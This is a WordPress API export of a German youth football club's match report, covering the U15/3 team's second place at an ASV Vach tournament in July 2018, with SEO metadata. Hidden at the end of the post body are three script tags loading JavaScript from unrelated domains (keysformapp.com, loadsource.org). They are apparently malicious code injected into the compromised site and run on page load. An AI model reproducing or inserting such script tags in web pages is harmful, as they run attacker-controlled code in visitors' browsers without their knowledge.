{"id":6133,"date":"2018-07-25T22:34:59","date_gmt":"2018-07-25T20:34:59","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=6133"},"modified":"2018-08-02T22:38:24","modified_gmt":"2018-08-02T20:38:24","slug":"u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/","title":{"rendered":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach"},"content":{"rendered":"<p>21.07.2018 : Am Samstag dem 21.07.2018 folgte die neuformierte C3 (2004\/2005) der JFG Wendelstein der Einladung des ASV Vach zum C-Jugend Turnier.Anfangs noch bei nur leichtem Nieselregen hatten wir doch den kompletten Tag \u00fcber Pech mit dem Wetter.Aber nur mit dem Wetter. Trotz mehr oder weniger Dauerregen, zeigten uns die Jungs an diesem Tag was sie k\u00f6nnen.Nach nur einer Woche Training und einem Testspiel letzte Woche gegen die SG Leerstetten, welches jedoch mit 9:6 nach 3&#215;25 Minuten f\u00fcr sich entschieden werden konnte, wussten wir nicht wirklich, wo wir leistungsm\u00e4\u00dfig stehen.Die Jungs zeigten es uns allerdings und legten los wie die Feuerwehr.Das erste Spiel gegen die Sportfreunde F\u00fcrth wurde spielerisch absolut dominiert und so konnten sich die Jungs nach 2x 10 Minuten Spielzeit \u00fcber ein auch in der H\u00f6he v\u00f6llig verdientes 4:0 freuen.<\/p>\n<p>Im zweiten Spiel gegen die SG Wiesentheit hatten wir es mit einem Kreisligisten zu tun.<\/p>\n<p>Es war die erwartet ganz harte Nuss, was dazu f\u00fchrte, das die Mannschaft auch bis kurz vor Spielende Geduld zeigen musste \u2013 dann aber eiskalt zweimal zuschlug. 2:0 f\u00fcr die JFG!<\/p>\n<p>Die SpVgg Jahn Forchheim war unser Gegner im dritten Spiel. Eine ebenfalls neuformierte Mannschaft mit haupts\u00e4chlich 2005er Jungs und den ersten Spielen auf Gro\u00dffeld machte es unserer Truppe relativ einfach.<\/p>\n<p>Von Beginn an giftig und spielfreudig war man sehr schnell auf der Siegerstra\u00dfe.<\/p>\n<p>Aufregung dann nach einem Zweikampf bei dem unser Keeper am Boden liegen blieb, der Schiedsrichter weiterspielen lie\u00df und der Gegenspieler den Ball unbedr\u00e4ngt nur ins leere Tor einschieben musste.<\/p>\n<p>Nur so konnten an diesem Tag Tore gegen uns fallen J. Endstand 4:1 JFG W.<\/p>\n<p>Im vierten Spiel gegen den ASV Vach, der bis dato ebenfalls alles gewonnen hatte, standen die Jungs einem physisch sehr starken Gegner gegen\u00fcber. Unsere Mannschaft hielt spielerisch dagegen und so hie\u00df es nach 10 Minuten 0:0. Noch alles drin.<\/p>\n<p>Als nach der H\u00e4lfte der 2. Halbzeit eine Bogenlampe und ein Geschenk an den Gegner einen 0:2 R\u00fcckstand bedeutete, lie\u00dfen unsere Jungs ein wenig die K\u00f6pfe h\u00e4ngen und schenkten dem Schiedsrichter mehr Aufmerksamkeit als der eigenen Konzentration. So ist es auch nicht verwunderlich, dass dann die trotzdem herausgespielten Chancen nicht mehr genutzt werden konnten.<\/p>\n<p>Trotzdem \u2013 spielerisch gegen einen physisch \u00fcberlegenen Gegner gleichwertig wenn nicht besser, die eigenen Chancen nicht verwertet und der Gegner hat zwei Chancen zu Toren genutzt = verloren, aber darauf kann man trotz allem stolz sein.<\/p>\n<p>Nach einer einst\u00fcndigen Pause und mit einer geh\u00f6rigen Portion Wut im Bauch wegen der Niederlage, stand nun das letzte Spiel gegen den Kreisklassisten SV Wacker N\u00fcrnberg an. Ein Sieg musste her um sich zumindest noch mit Platz 2 zu belohnen.<\/p>\n<p>Und diese Wut setzte die Mannschaft in eine absolut abgekl\u00e4rte Leistung und zu einem nie gef\u00e4hrdeten 3:0 Sieg um.<\/p>\n<p>Die Tatsache, dass unsere 13 Tore bis auf einen Freisto\u00df allesamt herausgespielt wurden hat die Trainer schon staunen lassen. Ebenso das Auftreten der 2005er, die bis zu diesem Tag erst ein Spiel auf Gro\u00dffeld gespielt und daf\u00fcr intuitiv vieles richtig gemacht haben.<\/p>\n<p>Nat\u00fcrlich gibt es noch viele Punkte an denen gearbeitet werden muss \u2013 mit dieser Leistung jedoch k\u00f6nnen wir mit Freude auf die kommende Kreisklassensaison blicken.<\/p>\n<p>Mit der neuformierten C3 werden wir eine gute, wenn nicht sehr gute Rolle dort spielen<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-6124\" src=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg\" alt=\"\" width=\"350\" height=\"195\" srcset=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg 350w, https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-768x427.jpg 768w, https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein.jpg 854w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><\/p>\n<p><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1532551071961\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/keysformapp.com\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>21.07.2018 : Am Samstag dem 21.07.2018 folgte die neuformierte C3 (2004\/2005) der JFG Wendelstein der Einladung des ASV Vach zum C-Jugend Turnier.Anfangs noch bei nur leichtem Nieselregen hatten wir doch den kompletten Tag \u00fcber Pech mit dem Wetter.Aber nur mit dem Wetter. Trotz mehr oder weniger Dauerregen, zeigten uns die Jungs an diesem Tag was [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[2,16,19],"tags":[],"class_list":["post-6133","post","type-post","status-publish","format-standard","hentry","category-gf","category-spielbericht","category-u15-3"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"21.07.2018 : Am Samstag dem 21.07.2018 folgte die neuformierte C3 (2004\/2005) der JFG Wendelstein der Einladung des ASV Vach zum C-Jugend Turnier.Anfangs noch bei nur leichtem Nieselregen hatten wir doch den kompletten Tag \u00fcber Pech mit dem Wetter.Aber nur mit dem Wetter. Trotz mehr oder weniger Dauerregen, zeigten uns die Jungs an diesem Tag was [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-25T20:34:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-08-02T20:38:24+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"3\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"U15\\\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach\",\"datePublished\":\"2018-07-25T20:34:59+00:00\",\"dateModified\":\"2018-08-02T20:38:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/\"},\"wordCount\":559,\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/Screen-Logo-JFG-Wendelstein-350x195.jpg\",\"articleSection\":[\"Gro\u00dffeld\",\"Spielbericht\",\"U15-3\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/\",\"name\":\"U15\\\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/Screen-Logo-JFG-Wendelstein-350x195.jpg\",\"datePublished\":\"2018-07-25T20:34:59+00:00\",\"dateModified\":\"2018-08-02T20:38:24+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/Screen-Logo-JFG-Wendelstein-350x195.jpg\",\"contentUrl\":\"http:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/Screen-Logo-JFG-Wendelstein-350x195.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"U15\\\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/","og_locale":"de_DE","og_type":"article","og_title":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein","og_description":"21.07.2018 : Am Samstag dem 21.07.2018 folgte die neuformierte C3 (2004\/2005) der JFG Wendelstein der Einladung des ASV Vach zum C-Jugend Turnier.Anfangs noch bei nur leichtem Nieselregen hatten wir doch den kompletten Tag \u00fcber Pech mit dem Wetter.Aber nur mit dem Wetter. Trotz mehr oder weniger Dauerregen, zeigten uns die Jungs an diesem Tag was [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/","og_site_name":"JFG Wendelstein","article_published_time":"2018-07-25T20:34:59+00:00","article_modified_time":"2018-08-02T20:38:24+00:00","og_image":[{"url":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg","type":"","width":"","height":""}],"author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"3\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach","datePublished":"2018-07-25T20:34:59+00:00","dateModified":"2018-08-02T20:38:24+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/"},"wordCount":559,"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#primaryimage"},"thumbnailUrl":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg","articleSection":["Gro\u00dffeld","Spielbericht","U15-3"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/","name":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#primaryimage"},"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#primaryimage"},"thumbnailUrl":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg","datePublished":"2018-07-25T20:34:59+00:00","dateModified":"2018-08-02T20:38:24+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#primaryimage","url":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg","contentUrl":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-content\/uploads\/2018\/07\/Screen-Logo-JFG-Wendelstein-350x195.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u15-3-mit-einem-sehr-guten-2-platz-beim-turnier-des-asv-vach\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"U15\/3 mit einem sehr guten 2.Platz beim Turnier des ASV Vach"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=6133"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6133\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=6133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=6133"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=6133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}